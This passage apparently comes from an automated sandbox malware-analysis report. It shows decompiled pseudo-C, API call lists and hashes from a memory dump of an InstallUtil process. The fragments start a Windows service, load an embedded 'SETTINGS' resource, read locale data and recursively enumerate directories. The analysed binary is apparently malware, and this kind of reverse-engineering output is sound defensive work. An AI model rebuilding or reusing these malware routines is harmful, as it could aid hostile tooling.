OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00416F1E,00000000), ref: 004172D1
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00416F1E,00000000), ref: 004172E6
CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 004172F3
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00416F1E,00000000), ref: 004172FE
CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417310
CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417313

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 3b4b6a42a88c35492e9b71304e6ff01650c3b585c4971f6a12f6b37ce0a60e4f
Instruction ID: e7c3370e248363d70cca44cf03121932cd1dafa8323dfe7473fd85b1d204e243
Opcode Fuzzy Hash: 3b4b6a42a88c35492e9b71304e6ff01650c3b585c4971f6a12f6b37ce0a60e4f
Instruction Fuzzy Hash: 2DF0E9710143146FD2005B71EC88DBF2ABCDFC5BAAB10042AF901961D2CF78CC869575

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0044E1AD(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x45b2f8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x45b300;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E004383C2(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0044e1b2
0x0044e1b3
0x0044e1ba
0x0044e25e
0x0044e26c
0x0044e277
0x0044e27d
0x0044e282
0x0044e284
0x0044e284
0x0044e28a
0x0044e28f
0x0044e28f
0x0044e279
0x0044e279
0x00000000
0x0044e279
0x0044e1c0
0x0044e1c5
0x00000000
0x00000000
0x0044e1cb
0x0044e1d0
0x0044e1d2
0x0044e1d2
0x0044e1d8
0x00000000
0x00000000
0x0044e1dd
0x0044e1f4
0x0044e1f4
0x0044e1fd
0x0044e1ff
0x00000000
0x00000000
0x0044e201
0x0044e206
0x0044e208
0x0044e208
0x0044e20e
0x00000000
0x00000000
0x0044e213
0x0044e231
0x0044e233
0x0044e256
0x00000000
0x0044e25b
0x0044e243
0x0044e24e
0x00000000
0x00000000
0x0044e250
0x00000000
0x0044e250
0x0044e215
0x0044e21d
0x00000000
0x00000000
0x0044e21f
0x0044e222
0x0044e228
0x00000000
0x00000000
0x00000000
0x0044e22a
0x0044e22c
0x0044e22e
0x00000000
0x0044e22e
0x0044e1df
0x0044e1e7
0x00000000
0x00000000
0x0044e1e9
0x0044e1ec
0x0044e1f2
0x00000000
0x00000000
0x00000000
0x0044e1f2
0x0044e1f8
0x0044e1fa
0x00000000

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044E4CC,?,00000000), ref: 0044E246
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044E4CC,?,00000000), ref: 0044E26F
GetACP.KERNEL32(?,?,0044E4CC,?,00000000), ref: 0044E284

Strings

OCP, xrefs: 0044E201
ACP, xrefs: 0044E1CB

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ef428767958845835335e45c7db6b177a5ddf4cf58c6bddbffebefdeaefd3fb9
Instruction ID: 0ac9d651d0f29da8eda36da026c118ff0bd0dcd63a7f79924f5161e0f5f6ae3e
Opcode Fuzzy Hash: ef428767958845835335e45c7db6b177a5ddf4cf58c6bddbffebefdeaefd3fb9
Instruction Fuzzy Hash: 88210632600100A6FB348F67C904BA7B3AAFF54B51B1681A6EC0AD7301EB76DD41C398

Uniqueness

Uniqueness Score: -1.00%

Function 00417CBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CBB(void** __ecx) {
				struct HRSRC__* _t1;
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t1 = FindResourceA( *0x46dd20, "SETTINGS", 0xa);
				_t7 = _t1;
				if(_t7 != 0) {
					_t3 = LockResource(LoadResource( *0x46dd20, _t7));
					_t4 = SizeofResource( *0x46dd20, _t7);
					 *_t5 = _t3;
					return _t4;
				}
				return _t1;
			}

0x00417cca
0x00417ccc
0x00417cd2
0x00417cd6
0x00417ce7
0x00417cf6
0x00417cfc
0x00000000
0x00417cfe
0x00417d01

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00417CCC
LoadResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CE0
LockResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CE7
SizeofResource.KERNEL32(00000000,?,?,?,0040CDC2), ref: 00417CF6

Strings

SETTINGS, xrefs: 00417CBF

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: b4207ba667ef7437e4300c6b29b2f7a22674368dd85d1eaeb129335f37b46b66
Instruction ID: d7911c1fd8fc725af0a65da68648f77094c6b5a4a6c4ddc08b386f161bf9ece1
Opcode Fuzzy Hash: b4207ba667ef7437e4300c6b29b2f7a22674368dd85d1eaeb129335f37b46b66
Instruction Fuzzy Hash: 8BE01A36A00754ABD7212FA6AC4CD963F79F7D97973000035F60186321EA7588909E59

Uniqueness

Uniqueness Score: -1.00%

Function 00407ED2 Relevance: 7.7, APIs: 5, Instructions: 222
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00407ED2(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t89;
				signed int _t94;
				intOrPtr* _t98;
				void* _t115;
				signed int _t123;
				signed int _t125;
				void* _t142;
				signed int _t143;
				intOrPtr _t146;
				char* _t209;
				void* _t213;
				void* _t217;
				void* _t219;
				intOrPtr _t220;
				void* _t221;
				void* _t223;

				_t146 = __ecx;
				E00453798(E00453B7D, _t217);
				_t220 = _t219 - 0x308;
				_push(_t142);
				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
				E0040209F(_t142, _t217 - 0x5c);
				_t77 = E004022C5(_t217 + 0x20, _t217 - 0x1c);
				_t79 = E0040228A(_t217 + 0x20, _t217 - 0x20);
				E00408448(_t217 - 0x28,  *((intOrPtr*)(E004022C5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
				_t221 = _t220 + 0xc;
				_t202 = _t217 + 8;
				_t213 = FindFirstFileW(E00401EC4(E004078F9(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
				 *(_t217 - 0x1c) = _t213;
				E00401EC9();
				if(_t213 != 0xffffffff) {
					_t143 = 0;
					__eflags = 0;
					while(1) {
						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
						__eflags = _t89;
						if(_t89 == 0) {
							break;
						}
						_t209 =  *((intOrPtr*)(_t217 - 0x18));
						__eflags =  *_t209;
						if( *_t209 == 0) {
							__eflags =  *(_t217 - 0x30c) & 0x00000010;
							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
								_t123 = E00438B0D(_t217 - 0x2e0, _t217 - 0x2e0, ".");
								__eflags = _t123;
								if(_t123 != 0) {
									_t125 = E00438B0D(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
									_pop(_t170);
									__eflags = _t125;
									if(__eflags != 0) {
										_t202 = E004079C1(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040413E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
										E00408472(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
										E00401EC9();
										E00401EC9();
										_t223 = _t221 - 0x18;
										E0040773A(_t143, _t223, _t128, __eflags, _t217 + 0x20);
										_t221 = _t223 - 0x18;
										E0040773A(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
										E00407ED2(_t209, _t202, __eflags);
										E00401EC9();
									}
								}
							}
							E0040413E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
							_t98 = E004022C5(_t217 - 0x40, _t217 - 0x28);
							_t215 = E0040228A(_t217 - 0x40, _t217 - 0x24);
							E00408448(_t217 - 0x44,  *((intOrPtr*)(E004022C5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
							_t221 = _t221 + 0xc;
							__eflags = E004082CB(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
							if(__eflags == 0) {
								L15:
								E00401EC9();
								_t213 =  *(_t217 - 0x1c);
								continue;
							} else {
								E00401FA2(_t217 - 0x5c, _t202, _t215, E00402077(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
								E00401F98();
								 *(_t217 - 4) = _t143;
								_t221 = _t221 - 0x18;
								_t202 = E00402ED0(_t143, _t217 - 0x74, E00418445(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x46e260);
								E00402ED0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
								_push(0x66);
								_t115 = E00404A78( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
								__eflags = _t115 - 0xffffffff;
								E00401F98();
								E00401F98();
								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
									_t143 = 0;
									__eflags = 0;
									goto L15;
								}
								E00401EC9();
								E00401F98();
								E00401EC9();
								E00401EC9();
								_t94 = 0;
								goto L17;
							}
						}
						FindClose(_t213);
						goto L6;
					}
					FindClose(_t213);
					E00401F98();
					E00401EC9();
					E00401EC9();
					_t94 = 1;
					goto L17;
				} else {
					_t143 = 1;
					L6:
					E00401F98();
					E00401EC9();
					E00401EC9();
					_t94 = _t143;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
					return _t94;
				}
			}

0x00407ed2
0x00407ed7
0x00407edc
0x00407ee2
0x00407ee5
0x00407ee8
0x00407eee
0x00407efa
0x00407f08
0x00407f24
0x00407f29
0x00407f38
0x00407f55
0x00407f57
0x00407f60
0x00407f68
0x00407f6e
0x00407f6e
0x00407f70
0x00407f78
0x00407f7e
0x00407f80
0x00000000
0x00000000
0x00407f86
0x00407f89
0x00407f8c
0x00407fb4
0x00407fbb
0x00407fcd
0x00407fd4
0x00407fd6
0x00407fe8
0x00407fee
0x00407fef
0x00407ff1
0x00408013
0x0040801b
0x00408027
0x0040802f
0x00408034
0x0040803d
0x00408042
0x0040804e
0x00408055
0x00408060
0x00408060
0x00407ff1
0x00407fd6
0x0040806f
0x0040807b
0x0040808e
0x004080a5
0x004080aa
0x004080ba
0x004080bd
0x00408176
0x00408179
0x0040817e
0x00000000
0x004080c3
0x004080db
0x004080e3
0x004080e8
0x004080eb
0x00408112
0x00408116
0x0040811c
0x00408124
0x00408129
0x00408132
0x0040813d
0x00408142
0x00408144
0x00408170
0x00408174
0x00408174
0x00000000
0x00408174
0x00408149
0x00408151
0x00408159
0x00408161
0x00408166
0x00000000
0x00408166
0x004080bd
0x00407f8f
0x00000000
0x00407f8f
0x00408187
0x00408190
0x00408198
0x004081a0
0x004081a5
0x00000000
0x00407f6a
0x00407f6a
0x00407f95
0x00407f98
0x00407fa0
0x00407fa8
0x00407fad
0x004081a7
0x004081aa
0x004081b7
0x004081b7

APIs

__EH_prolog.LIBCMT ref: 00407ED7
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407F4F
FindNextFileW.KERNEL32(00000000,?), ref: 00407F78
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407F8F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 2fe951166d1395251eba71003c0cdc166412e4604d5237fa9cfb8b2670ae89a3
Instruction ID: 8d8f50a9cfe8cc819608e56a08e892552cb0b09e6a4f2abad70f7dc2557b565b
Opcode Fuzzy Hash: 2fe951166d1395251eba71003c0cdc166412e4604d5237fa9cfb8b2670ae89a3
Instruction Fuzzy Hash: 4A8150728101199BCB15EBA1DD569ED7378AF14348F10427FF442B70E2EF386A4ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044E381 Relevance: 7.7, APIs: 5, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0044E381(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00444255(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00444255(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x45b2f4; // 0x17
					E0044E324(0, 0x45b1e0, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E0044DCC1(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E0044DDA7(_t92, _t99,  &_v20);
					} else {
						E0044DD0C(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x45b1dc; // 0x41
						_t77 = E0044E324(_t99, 0x45aed0, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044E1AD(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E00444B89(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E004318FB(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x440c4c
								E00444B89(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x440bac
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x440c2c
								E0043DE3F(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E0044DDA7(_t92, _t99,  &_v20);
						} else {
							E0044DD0C(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x0044e389
0x0044e390
0x0044e397
0x0044e39b
0x0044e39f
0x0044e3ad
0x0044e3b2
0x0044e3b3
0x0044e3b4
0x0044e3b5
0x0044e3bd
0x0044e3bf
0x0044e3c5
0x0044e3cb
0x0044e3ce
0x0044e3d0
0x0044e3d3
0x0044e3d7
0x0044e3de
0x0044e3eb
0x0044e3f0
0x0044e3f3
0x0044e3f6
0x0044e3f6
0x0044e3f8
0x0044e3fb
0x0044e3ff
0x0044e46f
0x0044e471
0x0044e473
0x0044e486
0x0044e486
0x0044e48d
0x0044e493
0x0044e496
0x00000000
0x0044e496
0x0044e475
0x0044e478
0x00000000
0x00000000
0x0044e47e
0x0044e483
0x00000000
0x0044e406
0x0044e406
0x0044e40a
0x0044e420
0x0044e411
0x0044e415
0x0044e415
0x0044e429
0x0044e42a
0x0044e4b4
0x0044e4b4
0x00000000
0x0044e430
0x0044e430
0x0044e43f
0x0044e444
0x0044e449
0x0044e499
0x0044e499
0x0044e499
0x0044e49b
0x0044e49f
0x0044e4b6
0x0044e4c2
0x0044e4cc
0x0044e4cf
0x0044e4d0
0x0044e4d2
0x00000000
0x00000000
0x0044e4d4
0x0044e4da
0x00000000
0x00000000
0x0044e4dc
0x0044e4e2
0x00000000
0x00000000
0x0044e4e8
0x0044e4ee
0x0044e4f0
0x00000000
0x00000000
0x0044e4f7
0x0044e4fd
0x0044e4ff
0x00000000
0x00000000
0x0044e501
0x0044e504
0x0044e506
0x0044e508
0x0044e508
0x0044e519
0x0044e51e
0x0044e520
0x0044e580
0x0044e4a3
0x0044e4b3
0x0044e4b3
0x0044e525
0x0044e52f
0x0044e53f
0x0044e545
0x0044e547
0x00000000
0x00000000
0x0044e54f
0x0044e55e
0x0044e564
0x0044e566
0x00000000
0x00000000
0x0044e570
0x0044e578
0x00000000
0x0044e57d
0x0044e4a1
0x00000000
0x0044e4a1
0x0044e44b
0x0044e44d
0x0044e451
0x0044e467
0x0044e458
0x0044e45c
0x0044e45c
0x0044e46c
0x00000000
0x0044e46c
0x0044e42a

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044E48D
IsValidCodePage.KERNEL32(00000000), ref: 0044E4E8
IsValidLocale.KERNEL32(?,00000001), ref: 0044E4F7
GetLocaleInfoW.KERNEL32(?,00001001,00440B2C,00000040,?,00440C4C,00000055,00000000,?,?,00000055,00000000), ref: 0044E53F
GetLocaleInfoW.KERNEL32(?,00001002,00440BAC,00000040), ref: 0044E55E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: df80448adb6dbcc8d83525514c000966fc8ab7e0377c049d259ea1cf243f73a2
Instruction ID: 39a8a5c125e4cbe99755be7ac3cee64471f244ed62b870d2846c08b958f2e924
Opcode Fuzzy Hash: df80448adb6dbcc8d83525514c000966fc8ab7e0377c049d259ea1cf243f73a2
Instruction Fuzzy Hash: 8451BE71A00219AAFF10DFA6DC45ABF77B8FF44311F04456AF910EB291E77899408B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406EEF Relevance: 7.7, APIs: 5, Instructions: 186
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t62;
				void* _t78;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t99;
				void* _t111;
				void* _t114;
				void* _t118;
				void* _t120;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;
				intOrPtr _t175;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;

				_t165 = __edx;
				_t120 = __ecx;
				E00453798(E00453B69, _t172);
				_t175 = _t174 - 0x2b0;
				_push(_t169);
				_push(_t167);
				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
				_t118 = _t120;
				E0040209F(_t118, _t172 - 0x4c);
				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
				if(_t118 != 0) {
					_t165 = 0x4610ec;
					_t111 = E00407A23(0x4610ec);
					_t188 = _t111;
					if(_t111 != 0) {
						_t185 = _t175 - 0x18;
						E0040773A(_t118, _t185, 0x4610ec, _t188, _t172 + 8);
						_t114 = E00417C45(_t118, _t172 - 0x34, 0x4610ec, _t172);
						_t175 = _t185 + 0x18;
						E00401ED3(_t172 + 0x20, _t165, _t169, _t114);
						E00401EC9();
					}
				}
				_t176 = _t175 - 0x18;
				E0040773A(_t118, _t176, _t165, _t188, _t172 + 8);
				_t62 = E00417C80(_t118, _t172 - 0x34, _t165, _t172);
				_t177 = _t176 + 0x18;
				E0040321D(_t62);
				E00401EC9();
				L00407735(_t118, _t172 + 8, _t167, _t172, "\\");
				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
				_t166 = _t172 + 8;
				_t170 = FindFirstFileW(E00401EC4(E004078F9(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
				 *(_t172 - 0x18) = _t170;
				E00401EC9();
				if(_t170 == 0xffffffff) {
					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
					E00435A36(_t172 - 0x1c, 0x469620);
				}
				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
					if( *0x46dae4 != 0) {
						E00401F98();
						E00401EC9();
						E00401EC9();
						E00401F98();
						_t78 = 0;
						__eflags = 0;
						L15:
						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
						return _t78;
					}
					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
						_t179 = _t177 - 0x18;
						E004020B6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
						_t180 = _t179 - 0x18;
						E0040773A(_t118, _t180, _t166, __eflags, _t172 + 0x20);
						_t88 = E0040413E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
						_t166 = _t172 + 8;
						_t89 = E004079C1(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
						_t181 = _t180 - 0x14;
						E00403222(_t118, _t181, _t172, __eflags, _t89);
						E00407168(_t118, _t172 + 8);
						_t177 = _t181 + 0x48;
						E00401EC9();
						L11:
						E00401EC9();
						continue;
					}
					if(E00438B0D(_t172 - 0x288, _t172 - 0x288, ".") == 0) {
						continue;
					}
					_t97 = E00438B0D(_t172 - 0x288, _t172 - 0x288, L"..");
					_t194 = _t97;
					if(_t97 == 0) {
						continue;
					}
					_t99 = E0040413E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
					_t166 = _t172 + 8;
					E004079C1(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
					E00401EC9();
					_t182 = _t177 - 0x18;
					E004020B6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
					_t183 = _t182 - 0x18;
					E0040773A(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
					_t184 = _t183 - 0x18;
					E0040773A(_t118, _t184, _t166, _t194, _t172 - 0x34);
					E00406EEF(_t118, _t166, _t194);
					_t177 = _t184 + 0x48;
					goto L11;
				}
				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
				FindClose(_t170);
				E00401F98();
				E00401EC9();
				E00401EC9();
				E00401F98();
				_t78 = 1;
				goto L15;
			}

0x00406eef
0x00406eef
0x00406ef4
0x00406ef9
0x00406f00
0x00406f01
0x00406f02
0x00406f05
0x00406f0a
0x00406f0f
0x00406f15
0x00406f17
0x00406f1f
0x00406f24
0x00406f26
0x00406f28
0x00406f31
0x00406f39
0x00406f3e
0x00406f45
0x00406f4d
0x00406f4d
0x00406f26
0x00406f52
0x00406f5b
0x00406f63
0x00406f68
0x00406f6f
0x00406f77
0x00406f84
0x00406f89
0x00406f99
0x00406fb3
0x00406fb5
0x00406fbb
0x00406fc3
0x00406fc5
0x00406fd5
0x00406fd5
0x00406fda
0x00406ff7
0x00407138
0x00407140
0x00407148
0x00407150
0x00407155
0x00407155
0x00407157
0x0040715a
0x00407167
0x00407167
0x00407004
0x0040709d
0x004070a6
0x004070ab
0x004070b4
0x004070c3
0x004070c9
0x004070cf
0x004070d4
0x004070da
0x004070e1
0x004070e6
0x004070ec
0x00407090
0x00407093
0x00000000
0x00407093
0x0040701f
0x00000000
0x00000000
0x0040702d
0x00407034
0x00407036
0x00000000
0x00000000
0x00407042
0x00407048
0x0040704e
0x00407057
0x0040705c
0x00407065
0x0040706a
0x00407073
0x00407078
0x00407081
0x00407088
0x0040708d
0x00000000
0x0040708d
0x004070f3
0x004070f8
0x00407101
0x00407109
0x00407111
0x00407119
0x0040711e
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00406EF4
FindFirstFileW.KERNEL32(00000000,?,00461290,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406FAD
__CxxThrowException@8.LIBVCRUNTIME ref: 00406FD5
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406FE2
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004070F8

Memory Dump Source

